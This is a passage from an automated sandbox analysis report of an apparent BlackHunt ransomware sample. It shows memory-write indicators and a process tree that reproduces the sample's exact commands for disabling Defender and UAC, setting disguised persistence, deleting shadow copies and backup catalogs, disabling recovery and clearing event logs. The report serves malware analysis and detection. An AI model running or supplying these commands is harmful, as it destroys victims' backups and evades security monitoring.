wevtutil.exe Token: SeSecurityPrivilege 7152 wevtutil.exe Token: SeBackupPrivilege 7152 wevtutil.exe Token: SeDebugPrivilege 4384 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1332 wrote to memory of 4744 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 88 PID 1332 wrote to memory of 4744 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 88 PID 1332 wrote to memory of 2120 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 90 PID 1332 wrote to memory of 2120 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 90 PID 1332 wrote to memory of 1620 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 92 PID 1332 wrote to memory of 1620 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 92 PID 1332 wrote to memory of 448 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 94 PID 1332 wrote to memory of 448 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 94 PID 1332 wrote to memory of 1872 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 97 PID 1332 wrote to memory of 1872 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 97 PID 4744 wrote to memory of 3944 4744 cmd.exe 96 PID 4744 wrote to memory of 3944 4744 cmd.exe 96 PID 2120 wrote to memory of 5108 2120 cmd.exe 99 PID 2120 wrote to memory of 5108 2120 cmd.exe 99 PID 1620 wrote to memory of 540 1620 cmd.exe 100 PID 1620 wrote to memory of 540 1620 cmd.exe 100 PID 448 wrote to memory of 3472 448 cmd.exe 101 PID 448 wrote to memory of 3472 448 cmd.exe 101 PID 1872 wrote to memory of 3900 1872 cmd.exe 172 PID 1872 wrote to memory of 3900 1872 cmd.exe 172 PID 1332 wrote to memory of 2372 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 102 PID 1332 wrote to memory of 2372 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 102 PID 1332 wrote to memory of 1640 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 105 PID 1332 wrote to memory of 1640 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 105 PID 1332 wrote to memory of 4280 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 107 PID 1332 wrote to memory of 4280 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 107 PID 1332 wrote to memory of 4316 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 109 PID 1332 wrote to memory of 4316 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 109 PID 1332 wrote to memory of 2280 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 112 PID 1332 wrote to memory of 2280 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 112 PID 1640 wrote to memory of 3788 1640 cmd.exe 111 PID 1640 wrote to memory of 3788 1640 cmd.exe 111 PID 1332 wrote to memory of 916 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 116 PID 1332 wrote to memory of 916 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 116 PID 2372 wrote to memory of 4300 2372 cmd.exe 115 PID 2372 wrote to memory of 4300 2372 cmd.exe 115 PID 1332 wrote to memory of 3280 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 117 PID 1332 wrote to memory of 3280 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 117 PID 4280 wrote to memory of 5104 4280 cmd.exe 119 PID 4280 wrote to memory of 5104 4280 cmd.exe 119 PID 4316 wrote to memory of 2944 4316 cmd.exe 183 PID 4316 wrote to memory of 2944 4316 cmd.exe 183 PID 1332 wrote to memory of 2812 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 121 PID 1332 wrote to memory of 2812 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 121 PID 916 wrote to memory of 996 916 cmd.exe 188 PID 916 wrote to memory of 996 916 cmd.exe 188 PID 2280 wrote to memory of 3240 2280 cmd.exe 124 PID 2280 wrote to memory of 3240 2280 cmd.exe 124 PID 1332 wrote to memory of 4200 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 125 PID 1332 wrote to memory of 4200 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 125 PID 3280 wrote to memory of 4100 3280 cmd.exe 127 PID 3280 wrote to memory of 4100 3280 cmd.exe 127 PID 1332 wrote to memory of 1644 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 128 PID 1332 wrote to memory of 1644 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 128 PID 1332 wrote to memory of 4028 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 130 PID 1332 wrote to memory of 4028 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 130 PID 1332 wrote to memory of 1604 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 132 PID 1332 wrote to memory of 1604 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 132 PID 2812 wrote to memory of 4592 2812 cmd.exe 133 PID 2812 wrote to memory of 4592 2812 cmd.exe 133 PID 1332 wrote to memory of 4980 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 135 PID 1332 wrote to memory of 4980 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 135 PID 1332 wrote to memory of 4844 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 140 PID 1332 wrote to memory of 4844 1332 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 140 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe"C:\Users\Admin\AppData\Local\Temp\23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1332 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:5108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:5104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:4200
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4028
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1604
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4980
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4844
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3772
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:452
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4248
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4264
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4484
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:464
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe" /F2⤵PID:2404
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe" /F3⤵
- Creates scheduled task(s)
PID:416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵
- Adds Run key to start application
PID:3900 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3304
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:716
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1004
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3552
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1948
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2944
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4400
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3680
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1580
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3076
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2688
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:7048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:5448
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:7408
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:7296
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1980
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5284
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2032
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:9160
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5812
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:8992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:6284
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5464
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:9132
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:9100
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:9116
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8876
-
-
-
